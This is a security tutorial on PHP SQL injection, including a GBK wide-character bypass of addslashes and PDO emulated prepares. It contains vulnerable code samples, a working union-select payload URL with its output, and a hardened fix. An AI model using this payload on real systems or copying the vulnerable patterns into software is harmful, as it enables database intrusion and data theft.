【1】Ordinary SQL injection:
<?php
// Vulnerable as written: the POST fields are concatenated straight into the SQL string.
// $up[1] (the value for the pic column) is set by code outside this snippet.
$sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '".time()."', '{$up[1]}', '{$_POST["detail"]}')";
$result = mysql_query($sql);
if($result && mysql_affected_rows() > 0 ) {
    echo "插入一条数据成功!";
}else {
    echo "数据录入失败!";
}
The submitted parameters go straight into the database without any filtering or escaping.
【2】Wide-character (GBK) injection:
Conditions: the table was created with its character set set to gbk (default charset=gbk), and when PHP connects to the database it switches the connection charset with mysql_query("set character_set_client=gbk").
(1) %df%27 can be used to bypass the addslashes() function.
(2) It also bypasses PDO's quote() function.
(3) PDO prepared statements are bypassed as well:
First form:
<?php
header("Content-type:text/html;charset=utf-8");
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132");
} catch (Exception $ex) {
    echo "连接失败";
    exit;
}
echo "连接成功";
// Charset is switched with a plain query after connecting, so the PDO driver
// is never told about it and keeps escaping as if the connection were single-byte.
$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
// Positional placeholder; with PDO's default emulated prepares the value is
// quoted client-side and spliced into this string before it reaches MySQL.
$query="select * from myuser where id=?";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array($id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data." ";
    }
    echo "<br>";
}
Second form:
<?php
header("Content-type:text/html;charset=utf-8");
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132");
} catch (Exception $ex) {
    echo "连接失败";
    exit;
}
echo "连接成功";
$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
// Same as the first form, but with a named placeholder.
$query="select * from myuser where id=:id";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array("id"=>$id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data." ";
    }
    echo "<br>";
}
echo "执行完毕";
var_dump($pdo->errorInfo());
Exploitation:
http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23
Output:
连接成功select * from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-logroot@localhost 4
执行完毕
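A hardened version of the second PDO script, added here as an example (it is not code from the original post). It assumes the same localhost/test database and a placeholder password. The bypass above works because the charset is changed with a query the driver does not see, and because PDO's default emulated prepares quote the value client-side and splice it into the SQL text; the fix is to declare the charset in the DSN, turn emulation off so binding happens server-side, and validate the type of id before it is used.

```php
<?php
// Added example: hardened form of the vulnerable PDO scripts above.
header("Content-type:text/html;charset=utf-8");

// 1. Declare the charset in the DSN so the PDO/mysqlnd driver escapes with it.
//    Never switch charset afterwards with "set character_set_client=gbk":
//    the driver keeps the charset negotiated at connect time, which is what lets
//    %df%27 turn the inserted backslash (0x5c) into the second byte of a GBK
//    character and leave the quote (0x27) unescaped.
$dsn = "mysql:host=localhost;dbname=test;charset=utf8mb4";
$options = [
    // 2. Real server-side prepared statements: the value travels separately from
    //    the SQL text, so no client-side quoting is involved at all.
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
];
try {
    // "password_placeholder" is an assumption, not the original credential.
    $pdo = new PDO($dsn, "root", "password_placeholder", $options);
} catch (PDOException $ex) {
    http_response_code(500);
    exit("连接失败");
}

// 3. Validate the type before the value reaches the query: id must be an integer,
//    so "-1%df%27 union select ..." is rejected here and never parsed as SQL.
$id = filter_input(INPUT_GET, "id", FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit("invalid id");
}

$stmt = $pdo->prepare("select * from myuser where id = :id");
$stmt->bindValue(":id", $id, PDO::PARAM_INT);
$stmt->execute();
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
    // 4. Encode output so stored data cannot inject HTML into the page.
    echo htmlspecialchars(implode(" ", $row), ENT_QUOTES, "UTF-8"), "<br>";
}
echo "执行完毕";
```

For the mysql_* code in section 1 the equivalent charset fix is mysql_set_charset("gbk") instead of a SET query, although that extension is removed in PHP 7 and the concatenated INSERT still needs to be rewritten with bound parameters.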